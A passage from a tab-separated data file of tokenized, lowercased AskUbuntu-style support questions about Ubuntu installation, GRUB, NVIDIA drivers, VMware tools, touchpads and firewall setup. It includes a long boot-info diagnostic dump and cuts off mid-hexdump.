card controller ( rev 05 ) 0b:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) so i guess the important bit is bcm4311 . any help would be greatfull .
50442	re-installing grub2 , getting error on grub-probe	when i was trying to reinstall grub for my ubuntu 10.04 from a 11.04 live cd , i was getting error as : grub-probe error : error : can not find a drive for /media/linux/boot/grub ( is /dev mounted ? ) my ubuntu partition is sda6 and i was using the following command : sudo grub-install -- boot-directory=/media/linux/boot /dev/sda6 -- recheck please resolve this error for me..
50443	way to disable hibernate from within gconf-editor so button disappears ?	there used to be a way to disable hibernate from gconf-editor : apps - > gnome-power-manager - > can_hibernate . unticking `` can_hibernate '' would even remove the hibernate button from the shutdown menu . this gconf option appears to no longer be present . is there another way to disable hibernate and simultaneously remove the hibernate button from the shutdown menu ?
50444	apt-get install firefox-3.6 installs 5.0	as title says , i 'm trying to install firefox 3.6 . however , i have no luck with achieving that . i tried apt-get install firefox-3.6 and after installation in about : there is `` firefox 5.0 '' how can i force 3.6 to install ?
50447	app that will rip mp3s from an analog cassette tape ?	i have a few audio cassette tapes from the 1980s : ) the albums were never released on cd , and to prevent any more deterioration and from losing the songs forever i wanted to rip the tapes to mp3 . mp3 because this is the only format my car accepts . and i want to play them in my car and use the car 's audio controls . is there an app that will let me do this ?
50451	error `` fixing recursive fault but reboot is needed ''	i am trying to install ubuntu for the first time . ( long time windows user , first time linux ! ) version = 11.04 hardware = acer travelmate 4050 i can boot from usb or cd and it loads fine i have installed and reinstalled several times from both usb and cd and it completes correctly however , when i boot from the hdd i get the above error i do n't see any errors like `` kernel panic '' mentioned elsewhere it happens whether i boot with ac adapter in or out and also with adapter in but battery out not sure how to get further info to help with diagnosis suggestions ? no suggestions at all ? i tried enabling boot logging but still have a blank log file ... surely a machine that boots perfectly off the dvd and usb but wont boot off the hhd after a supposedly successful install is a good challenge for someone ... please ...
50453	how do i redirect my audio output to usb speaker from laptop ?	i am running ubuntu in dell inspiron . previously when i used windows vista , my usb speakers ( logitech ) worked well . now when i connect to ubuntu , it is not working . any idea how to send the audio output to the usb speakers ?
50454	vmware-tools installation fails	i am trying to install vmwaretools-8.4.6-385536.tar.gz ( vmware tools ) on the following operating system : ubuntu 11.04 linux ubuntu 2.6.38-8-generic # 42-ubuntu smp mon apr 11 03:31:50 utc 2011 i686 i686 i386 gnu/linux i am using vmplayer version 3.1.4 - build 385536 after starting the installation i am getting the following errors : what is the directory that contains the init scripts ? [ /etc/init.d ] error opening no such file or directory distribution provided drivers for xorg x server are used . skipping x configuration because x drivers are not included . creating a new initrd boot image for the kernel. < br > update-initramfs : generating /boot/initrd.img-2.6.38-8-generic starting vmware tools services in the virtual machine : switching to guest configuration : done blocking file system : done guest operating system daemon : failed virtual printing daemon : done unable to start services for vmware tools can somebody help in this ?
50455	install and run php in ubuntu 9.04 desktop edition in live mode	my system runs on windows xp , i need to run a php project in ubuntu , but dont want to install ubuntu on the hdd . so need to run it in live mode , now please guide me to install php on ubuntu so i can test my php project . i have ubuntu 9.04 desktop edition
50458	does lts releases include repo exceptions like firefox ?	will the lts repo provide the latest and greatest of firefox and any other softwares treated the same way ? or do the exceptions apply to regular releases only ?
50464	can not copy the contents of virtual hard-drive to my physical disk	i have a vmware ubuntu image on my machine which i want to overwrite my current partition . when i run : sudo qemu-img convert my-image.vmdk -o raw /dev/sda1 i end up with below error : qemu-img : /dev/sda1 : error while converting raw : no space left on device is there anyway i can overwrite my existing hd partition without the error above ?
50467	how to automatically start programs in specific workspaces on start up	i would like to add a command at the rc.d system by which , when ubuntu starts it will run different program at different workspaces.i.e : workspace 1 : chrome , workspace 2 : thunderbird.how could this be achieved ? is there any tool ?
50469	nvidia api mismatch	i had planned a day of relaxing with portal 2 but on starting steam ( for the first time in a couple of weeks ) i was greeted with the following message in the terminal : error : api mismatch : the nvidia kernel module has version 270.41.19 , but this nvidia driver component has version 270.41.06 . please make sure that the kernel module and all nvidia driver components have the same version . i 'll confess i do n't really know what it 's talking about when it says driver . the verion of nvidia-current is 270.41.19 . i thought that was the driver and module , all in one . i use the x-swat ppa and i have noted that the nvidia-settings package has boosted to 275.09.07 . as this is just a settings application , i do n't think this mismatch has anything to do with this . it 's also not the same version as the problem being described . i 'd rather not purge back to the standard nvidia driver as it 's less than stable on my gtx580 . i would accept an answer that takes the manual setup and makes it recompile when the kernel recompiles ( ie , some dkms wizardry ) but it has to work . i do n't want to drop back to text-mode every time i restart after a kernel upgrade . edit : minecraft works without a single complaint about driver versions . penumbra dies with roughly the same error when entering a game . edit : here 's what i 'm dealing with in terms of 32bit files . they all seem to be at the right version . ls -l /usr/lib32/nvidia-current/ | awk ' { print $ 8 `` `` $ 9 `` `` $ 10 } ' libcuda.so - > libcuda.so.270.41.19 libcuda.so.1 - > libcuda.so.270.41.19 libcuda.so.270.41.19 libgl.la libgl.so - > libgl.so.1 libgl.so.1 - > libgl.so.270.41.19 libgl.so.270.41.19 libnvcuvid.so - > libnvcuvid.so.1 libnvcuvid.so.1 - > libnvcuvid.so.270.41.19 libnvcuvid.so.270.41.19 libnvidia-cfg.so - > libnvidia-cfg.so.1 libnvidia-cfg.so.1 - > libnvidia-cfg.so.270.41.19 libnvidia-cfg.so.270.41.19 libnvidia-compiler.so - > libnvidia-compiler.so.1 libnvidia-compiler.so.1 - > libnvidia-compiler.so.270.41.19 libnvidia-compiler.so.270.41.19 libnvidia-glcore.so.270.41.19 libnvidia-ml.so - > libnvidia-ml.so.1 libnvidia-ml.so.1 - > libnvidia-ml.so.270.41.19 libnvidia-ml.so.270.41.19 libnvidia-tls.so.270.41.19 libnvidia-wfb.so.1 - > libnvidia-wfb.so.270.41.19 libnvidia-wfb.so.270.41.19 libopencl.so - > libopencl.so.1 libopencl.so.1 - > libopencl.so.1.0 libopencl.so.1.0 - > libopencl.so.1.0.0 libopencl.so.1.0.0 libxvmcnvidia_dynamic.so.1 - > libxvmcnvidia.so.270.41.19 libxvmcnvidia.so - > libxvmcnvidia.so.270.41.19 libxvmcnvidia.so.1 - > libxvmcnvidia.so.270.41.19 libxvmcnvidia.so.270.41.19 edit 2 : i might have found something . lurking in /usr/lib32/ proper ( not the nvidia-current subdir ) i found the following : ls -l /usr/lib32/ | awk ' { print $ 8 `` `` $ 9 `` `` $ 10 } ' | grep 270 libcuda.so.1 - > libcuda.so.270.41.06 libcuda.so.270.41.06 libgl.so.1 - > libgl.so.270.41.06 libgl.so.270.41.06 libnvidia-compiler.so.270.41.06 libnvidia-glcore.so.270.41.06 libnvidia-tls.so.270.41.06 libvdpau.so.1 - > libvdpau.so.270.41.06 libvdpau.so.270.41.06 libvdpau_trace.so - > vdpau/libvdpau_trace.so.270.41.06 for some reason everything in /usr/lib32/nvidia-current/ is the right version but there 's a load of cruft in /usr/lib32/ that might be ruining the party . edit 3 : trying to track down which package owns these files has failed : find /usr/lib32 -iname '*270.41.06* ' -exec dpkg -s `` { } '' \ ; dpkg-query : no path found matching pattern /usr/lib32/libnvidia-compiler.so.270.41.06 . dpkg-query : no path found matching pattern /usr/lib32/libgl.so.270.41.06 . dpkg-query : no path found matching pattern /usr/lib32/vdpau/libvdpau_nvidia.so.270.41.06 . dpkg-query : no path found matching pattern /usr/lib32/vdpau/libvdpau_trace.so.270.41.06 . dpkg-query : no path found matching pattern /usr/lib32/libvdpau.so.270.41.06 . dpkg-query : no path found matching pattern /usr/lib32/tls/libnvidia-tls.so.270.41.06 . dpkg-query : no path found matching pattern /usr/lib32/libnvidia-tls.so.270.41.06 . dpkg-query : no path found matching pattern /usr/lib32/libcuda.so.270.41.06 . dpkg-query : no path found matching pattern /usr/lib32/libnvidia-glcore.so.270.41.06 . any tips on how i should deal with these broken versions ? delete them ? delete then symlink to ./nvidia-current/ versions ?
50471	set up a gui managed firewall for other machines ?	what ways are there of setting up a firewall that can be managed with a gui that allows you to firewall ( filter* ) incoming traffic routed to other machines ? can gufw do it ? firestarter ? ( or should that be avoided because it is supposedly no longer updated ? ) *by filtering , i 'm mean the traffic i am setting rules up for is not destined for this computer . it is either from or to other computers on my lan . say , for ( a simplified , hypothetical ) example : i have an ethernet connection from my isp that i have plugged into eth0 . it gets an address of 216.228.1.189 and i also have 216.228.15.0/24 routed to me , so i do n't have to do any nat . i have a switch attached to my second ethernet port ( eth1 ) . attached to it are various pcs ( that do not necessarily have a host-based firewall on them ) that have addresses out of my 216.228.15.0/24 block statically set . how can i use my ubuntu box ( which is doing routing and no nat ) to block incoming connections from eth0 that are being routed to my various pcs and let through just a few specific ports on a per host basis ?
50474	two work space in a single monitor ?	i have a lcd monitor , i want to view two workpaces together in the single monitor . simply said i want two split my monitor into two workspace all the time . any ideas people ? i 've seen compiz showing all workspaces in single window and make transition . but i just need two of them . if monitor resolution is 1440 * 900. then i need two workspace with 720*450 side by side .
50477	does `` erasing 10.04 and installing 11.04 '' erase document from my windows installation ?	i have a doubt regarding the installation of ubuntu 11.04 on my thinkpad laptop . currently , my laptop has dual boot namely ubuntu 10.04 and windows xp . when i tried with live cd of ubuntu 11.04 for installation , i have the following option fresh installation upgrading 10.04 to 11.04 with files retained erasing 10.04 and installing 11.04 ( all the previous software and documents will be erased ) . if i choose option 3 , will my windows xp unaffected ?
50480	which open source twitter clients properly support both twitter lists and read/unread ?	the client must have this feature : if i read a tweet in one list , that tweet must not display as unread in another list , or the main timeline . choqok does not have this feature ( yet ) .
50481	downloading large files hangs system	when im trying to download large files , i.e . 1gb or more under firefox , first of all it starts with very big download speed and in few seconds in almost get up to max ( ~11 mbps ) . it is downloading very fast , but when downloaded size becomes near 700-800mb and more , my system almost completely hangs , so i can do nothing - i just have to wait until it finishes downloading . also when it hangs , i ca n't see the download progress - it looks like it completely hangs . sometimes , however , if the file size is near 1gb , the system comes back from hang , finishing download , but sometimes i just cant wait before system comes back and have to kill ff from top ( it takes me 2 minutes to do this , because of very slow system performance ) . i use firefox as primary browser . if i use wget with direct link to file - everything is fine . speed at max , no performance decrease . so what can i do ?
50485	correct ubuntu version for intel i5 pc ?	i downloaded this iso image ubuntu-11.04-desktop-amd64.iso to install on my pc later . my pc 's cpu is an intel i5 , do i have the correct iso image ? thanks in advance .
50487	while installing ffmpeg giving error during make	i want to install ffmpeg on ubuntu . and following this article http : //pasindudps.blogspot.com/2010/12/compiling-ffmpeg-in-ubuntu-1010.html but when m doing make after config then go to the ffmpeg folder . cd ffmpeg start the installation ./configure -- enable-gpl -- enable-version3 -- enable-nonfree -- enable-postproc \ -- enable-libfaac -- enable-libmp3lame -- enable-libopencore-amrnb \ -- enable-libopencore-amrwb -- enable-libtheora -- enable-libvorbis \ -- enable-libvpx -- enable-libx264 -- enable-libxvid -- enable-x11grab make giving this error /home/reach121/ffmpeg/libavcodec/x86/cabac.h:93 : undefined reference to `ff_h264_norm_shift' /home/reach121/ffmpeg/libavcodec/x86/cabac.h:93 : undefined reference to `ff_h264_lps_range' /home/reach121/ffmpeg/libavcodec/x86/cabac.h:93 : undefined reference to `ff_h264_norm_shift' /home/reach121/ffmpeg/libavcodec/x86/cabac.h:93 : undefined reference to `ff_h264_mlps_state' /home/reach121/ffmpeg/libavcodec/x86/cabac.h:93 : undefined reference to `ff_h264_norm_shift' collect2 : ld returned 1 exit status make : *** [ ffmpeg_g ] error 1 please suggest why this error is coming and what to do to solve this problem
50489	any web developer using ubuntu ?	i am using windows 7 and i would like to know if there is a web developer using ubuntu as its os and how satisfied are you and can you also link you site link made on ubuntu for better view on ubuntu as an opportunity for me doing web development on it .
50491	detect touchpad as touchpad	my touchpad seems to be recognized as a mouse instead of a touchpad . i have a dell precision m4600 , and i am running ubuntu 11.04 64-bit . vegard @ vegard-laptop : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=12 [ slave pointer ( 2 ) ] ⎜ ↳ imps/2 alps glidepoint id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_fhd id=10 [ slave keyboard ( 3 ) ] ↳ logitech usb receiver id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=15 [ slave keyboard ( 3 ) ] even though it seems to detected properly , i do not have any touchpad settings available in mouse preferences . my problem , specifically , is that my clumsy hands touch the touchpad while i am typing , send errant clicks my way , and i 'd like to disable the touchpad while typing .
50493	setting up a web server , using multiple user accounts	i’ve just installed ubuntu server on a new server and have been looking around for tutorials on setting up a web server with multiple user accounts . how i’ve set small web servers like this in the past is the same way most of the tutorials suggest , by creating directories within /var/www/ and then using apache virtual hosts to redirect the traffic . what i’m trying to do is create a system whereby the user accounts are setup under /home/new_account/ , and then the public_html directory is within that , which is where the virtual hosts links to . is it as simple as that ? if i wanted to automate it from a control panel , can i create accounts easily using , say php ?
50497	correct openoffice version for ubuntu 11.04 desktop amd64 ?	from openoffice download page what open-office version should i download for ubuntu 11.04 desktop amd64 , that has english interface and supports arabic characters ?
50498	how to configure firefox to not save anything other than authentication cookies ?	i want firefox to purge anything other than authentication cookies every session - how can i configure it ?
50502	update 10.10 server under vmware	i 'm using ubuntu server 10.10 under vmware workstation 7.1.3 and i wonder how to update ubuntu server via terminal since i do n't have any gui .
50503	why do i get unity instead of classic when using nx ?	recently i installed freenx on my pc and when i login with my 'dev ' account i get the unity interface rather than classic gnome . this is odd as my last login before freenx was with the classic interface . i would like to have classic over freenx by default . i do login with a 'watch iplayer ' account where the unity interface works a treat . for this reason i would prefer not to uninstall unity . any ideas ?
50510	mongod not found !	i have just installed mongodb on a linode server , following their instructions for the installation process . the problem is when trying to run mongod with a control script i 'm getting the following error : starting : /opt/bin/mongodb-start : 4 : /opt/mongodb/bin/mongod : not found mongod is definitely at /opt/mongodb/bin/mongod ! why is the control script not finding it ? i 've also tried running mongod directly , without a control script and it just gives me the following . -bash : mongod : command not found
50513	ca n't run this shell script	so i 'm trying to install this script i do copy the folder in ~/documents/icambridge-get-shit-done-1222b6b change .bashrc ( the one in the user directory , is that the right one ? ) by adding a line path= : ~/documents/icambridge-get-shit-done-1222b6bâ $ { path } â set the files in icambridge-get-shit-done-1222b6b as execs using sudo chmod +x type sudo ./get-shit-done and i get : /usr/bin/env : php : no such file or directory what is the problem ?
50515	ca n't login to 11.04 ~90 % of the time	since i installed ubuntu 11.04 , one of the following things happen when i try to login : i see my wallpaper and my mouse cursor , but nothing else loads . every ~10-20 seconds , the screen goes black for about one second , then shows just my wallpaper and mouse cursor again . this happens about 60 % of the time that i try to log in . i see my wallpaper and my mouse cursor , but after ~10-20 seconds , the screen goes black and stays black until i turn off my computer . this happens about 15 % of the time that i try to login in . i see a screen like the one in the below image ( open the image in a new tab to see it in greater detail ) . i believe it is warning about a problem with compiz or my radeon drivers . this happens about 15 % of the time that i try to log in . login is successful . this happens about 10 % of the time that i try to log in . i see the problem both in the `` unity '' session and the `` ubuntu classic '' session . it does not appear to occur in `` ubuntu classic ( no effects ) '' , but i have not tested that exhaustively . i am running ubuntu 11.04 with latest updates on a dell studio xps 16 . my videocard is a radeon hd 4670 . the full result of sudo lshw -sanitize is here . does anyone know what 's going on ? i apologize if this is the wrong place for such a question . i thought that i should report on launchpad bugs , but ubuntu-bug requested that i ask on this site before filing a bug .
50517	how well does an inca im-201w wireless work ?	i 'm using ubuntu 11.04 . i 'll buy a wireless modem , inca im-201w . but i 'm looking supported os of modem : windows xp , vista , 7 . there is n't ubuntu in list.so what 's the meaning of this ? should n't i buy this modem ? i will use wireless connection . ( ps . sometimes , while i 'm trying to connect a wireless network on any cafe , i 'm having problem . my laptop is n't connecting to wireless networks sometimes . )
50519	how to authenticate googlecl using terminal	i 'm trying to use googlecl on my ubuntu server to send pictures from my server to picasa . i ca n't seem to authenticate via google using w3m , so i 'm wondering if there is some other way to authenticate googlecl via oauth .
50522	replacing unity bar with docky ?	what i 'm trying to do is disable the unity side bar ( launcher ) which shows by default and is on the left and use docky instead . i want to keep all of the rest of the features of unity ( the nice integration of application menus and the top bar for instance ) .
50523	ca n't add fedora 14 to grub	today i installed fedora 14 in a different partition in the same hard drive as ubuntu . at the fedora 14 installation , i chose not to install boot-loader in the mbr , and instead chose to install it in the fedora partition itself , which is according to my hd layout /sda3 . after the fedora 14 installation i booted in to ubuntu and ran sudo update-grub but 'grub.cfg ' fails to add fedora 14 in to the os list . here is the output of boot-info script . boot info script 0.60 from 17 may 2011 ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos1 ) /boot/grub on this drive . sda1 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 11.04 boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda2 : __________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sda5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sda3 : __________________________________________________________________________ file system : ext4 boot sector type : grub legacy boot sector info : grub legacy ( v0.97 ) is installed in the boot sector of sda3 and looks at sector 49897340 on boot drive # 1 for the stage2 file . a stage2 file is at this location on /dev/sda . stage2 looks on partition # 3 for /grub/grub.conf . operating system : boot files : /grub/menu.lst /grub/grub.conf sda4 : __________________________________________________________________________ file system : lvm2_member boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 40.0 gb , 40020664320 bytes 255 heads , 63 sectors/track , 4865 cylinders , total 78165360 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 49,865,759 49,863,712 83 linux /dev/sda2 74,866,686 78,163,967 3,297,282 5 extended /dev/sda5 74,866,688 78,163,967 3,297,280 82 linux swap / solaris /dev/sda3 49,866,752 50,890,751 1,024,000 83 linux /dev/sda4 50,890,752 74,864,639 23,973,888 8e linux lvm '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 03e2a8da-171f-49e9-b24d-434e66cd1140 ext4 /dev/sda3 dea81d77-a375-4d0e-954e-1829f6b91f10 ext4 /dev/sda4 mzvoj0-ghju-djr4-0g2y-szz0-ltfw-f01yf9 lvm2_member /dev/sda5 3e89ba8e-7754-4ee4-aca1-e2a82bffb7a7 swap ================================ mount points : ================================= device mount_point type options /dev/sda1 / ext4 ( rw , errors=remount-ro , user_xattr , commit=0 ) =========================== sda1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 2 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 03e2a8da-171f-49e9-b24d-434e66cd1140 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=1024x768 load_video insmod gfxterm fi terminal_output gfxterm insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 03e2a8da-171f-49e9-b24d-434e66cd1140 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 2.6.38-8-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 03e2a8da-171f-49e9-b24d-434e66cd1140 linux /boot/vmlinuz-2.6.38-8-generic root=uuid=03e2a8da-171f-49e9-b24d-434e66cd1140 ro quiet splash vt.handoff=7 initrd /boot/initrd.img-2.6.38-8-generic } menuentry 'ubuntu , with linux 2.6.38-8-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 03e2a8da-171f-49e9-b24d-434e66cd1140 echo 'loading linux 2.6.38-8-generic ... ' linux /boot/vmlinuz-2.6.38-8-generic root=uuid=03e2a8da-171f-49e9-b24d-434e66cd1140 ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.38-8-generic } submenu `` previous linux versions '' { menuentry 'ubuntu , with linux 2.6.35-28-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 03e2a8da-171f-49e9-b24d-434e66cd1140 linux /boot/vmlinuz-2.6.35-28-generic root=uuid=03e2a8da-171f-49e9-b24d-434e66cd1140 ro quiet splash vt.handoff=7 initrd /boot/initrd.img-2.6.35-28-generic } menuentry 'ubuntu , with linux 2.6.35-28-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 03e2a8da-171f-49e9-b24d-434e66cd1140 echo 'loading linux 2.6.35-28-generic ... ' linux /boot/vmlinuz-2.6.35-28-generic root=uuid=03e2a8da-171f-49e9-b24d-434e66cd1140 ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.35-28-generic } menuentry 'ubuntu , with linux 2.6.32-21-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 03e2a8da-171f-49e9-b24d-434e66cd1140 linux /boot/vmlinuz-2.6.32-21-generic root=uuid=03e2a8da-171f-49e9-b24d-434e66cd1140 ro quiet splash vt.handoff=7 initrd /boot/initrd.img-2.6.32-21-generic } menuentry 'ubuntu , with linux 2.6.32-21-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 03e2a8da-171f-49e9-b24d-434e66cd1140 echo 'loading linux 2.6.32-21-generic ... ' linux /boot/vmlinuz-2.6.32-21-generic root=uuid=03e2a8da-171f-49e9-b24d-434e66cd1140 ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.32-21-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 03e2a8da-171f-49e9-b24d-434e66cd1140 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 03e2a8da-171f-49e9-b24d-434e66cd1140 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # if [ `` x $ { timeout } '' ! = `` x-1 '' ] ; then if keystatus ; then if keystatus -- shift ; then set timeout=-1 else set timeout=0 fi else if sleep -- interruptible 3 ; then set timeout=0 fi fi fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda1/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation # commented out by dropbox # uuid=03e2a8da-171f-49e9-b24d-434e66cd1140 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=3e89ba8e-7754-4ee4-aca1-e2a82bffb7a7 none swap sw 0 0 uuid=03e2a8da-171f-49e9-b24d-434e66cd1140 / ext4 errors=remount-ro , user_xattr 0 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 0.065803528 = 0.070656000 boot/grub/core.img 1 21.263332367 = 22.831329280 boot/grub/grub.cfg 1 0.771381378 = 0.828264448 boot/initrd.img-2.6.31-wl 1 2.054199219 = 2.205679616 boot/initrd.img-2.6.32-21-generic 3 2.893260956 = 3.106615296 boot/initrd.img-2.6.35-28-generic 2 6.833232880 = 7.337127936 boot/initrd.img-2.6.38-8-generic 2 1.772453308 = 1.903157248 boot/vmlinuz-2.6.32-21-generic 2 2.068012238 = 2.220511232 boot/vmlinuz-2.6.35-28-generic 1 5.532531738 = 5.940510720 boot/vmlinuz-2.6.38-8-generic 1 6.833232880 = 7.337127936 initrd.img 2 2.893260956 = 3.106615296 initrd.img.old 2 5.532531738 = 5.940510720 vmlinuz 1 2.068012238 = 2.220511232 vmlinuz.old 1 ============================= sda3/grub/grub.conf : ============================= -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # grub.conf generated by anaconda # # note that you do not have to rerun grub after making changes to this file # notice : you have a /boot partition . this means that # all kernel and initrd paths are relative to /boot/ , eg . # root ( hd0,2 ) # kernel /vmlinuz-version ro root=/dev/mapper/volgroup-lv_root # initrd /initrd- [ generic- ] version.img # boot=/dev/sda3 default=0 timeout=0 splashimage= ( hd0,2 ) /grub/splash.xpm.gz hiddenmenu title fedora ( 2.6.35.6-45.fc14.i686 ) root ( hd0,2 ) kernel /vmlinuz-2.6.35.6-45.fc14.i686 ro root=/dev/mapper/volgroup-lv_root rd_lvm_lv=volgroup/lv_root rd_lvm_lv=volgroup/lv_swap rd_no_luks rd_no_md rd_no_dm lang=en_us.utf-8 sysfont=latarcyrheb-sun16 keyboardtype=pc keytable=us rhgb quiet initrd /initramfs-2.6.35.6-45.fc14.i686.img -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda3 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 23.792903900 = 25.547436032 grub/grub.conf 1 23.792903900 = 25.547436032 grub/menu.lst 1 23.793020248 = 25.547560960 grub/stage2 1 23.817364693 = 25.573700608 initramfs-2.6.35.6-45.fc14.i686.img 2 23.787566185 = 25.541704704 initrd-plymouth.img 1 23.791228294 = 25.545636864 vmlinuz-2.6.35.6-45.fc14.i686 1 ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda2 00000000 81 71 62 ff a1 94 89 ff 4d 43 3a ff fa f2 ec ff |.qb ... ..mc : ... ..| 00000010 fb f6 f1 ff fc f8 f4 ff fc f8 f4 ff fc f8 f4 ff | ... ... ... ... ... .| 00000020 5d 56 50 